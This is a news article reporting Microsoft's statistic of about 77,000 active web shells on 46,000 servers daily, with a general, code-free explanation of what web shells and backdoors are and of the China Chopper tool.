Image: Microsoft
In a blog post promoting the capabilities of its commercial security platform — the Microsoft Defender ATP — Microsoft said that on a daily basis the company’s security team detects and tracks on average around 77,000 active web shells, spread across 46,000 infected servers.
But while the Microsoft blog post goes on to promote Defender ATP’s industry-recognized detection capabilities, the nugget in Microsoft’s recent marketing material is the 77,000 and 46,000 daily statistics.
These two numbers are staggering in terms of size, and especially the 77,000 figure, which is far far larger than any previous reports about web shell prevalence.
For example, earlier this month GoDaddy’s Sucuri reported on cleaning around 3,600 web shells from hacked websites during all last year, in 2019, a number dwarfed by Microsoft’s daily detection count.
What’s a web shell
Microsoft’s numbers highlight the prevalence of these tools in the today’s hackers’ arsenals — where web shells are considered a must for every threat actor, from lowly hacktivist groups defacing websites to state-sponsored cyber-espionage groups.
Web shells are crucial because of their functions. For non-technical ZDNet readers that have not encountered the term until today, a “web shell” refers to a malicious program or script that’s installed on a hacked server.
They provide a visual interface that hackers can use to interact with the hacked server and its filesystem. Most web shell contain basic functions to rename, copy, move, and even edit or upload new files on a server. They can also be used to change file and directory permissions, or archive and download (steal) data from the server.
Hackers usually install web shells by exploiting vulnerabilities in internet-facing servers or web applications (such as CMS, CMS plugins, CMS themes, CRMs, intranets, etc.).
Web shells can be written in any programming language, from Go to PHP. This allows hackers to hide web shells inside any website’s code under generic names (like index.asp or uploader.php), which makes detection by a human operator almost impossible without the aid of a web firewall or web malware scanner.
If a web shell is discovered, a backdoor script is also often nearby. Web shells and backdoor scripts are often used together. Hackers usually breach a server, plant a web shell to allow them to interact with its filesystem, and then they install a backdoor — which is an automated script that reinstalls the web shell at regular intervals, or keeps alive a way for the hacker to reinfect the server if the web shell is ever discovered and removed.
Today’s most popular web shell is, by far, a tool called China Chopper. First spotted in 2012, this small but feature-packed web shell, is the work of Chinese hackers. It was released on a Chinese hacking forum, from where it was universally adopted by almost every threat actor across the globe.
In its blog post yesterday, Microsoft warned system administrators to take web shells seriously. Based on their past investigations, Microsoft says hackers often used web shells to upload other hacking tools on a victim’s systems, tools that were later used for reconnaissance operations and lateral movement across a victim’s internal network, making simple web server hacks into much bigger security incidents.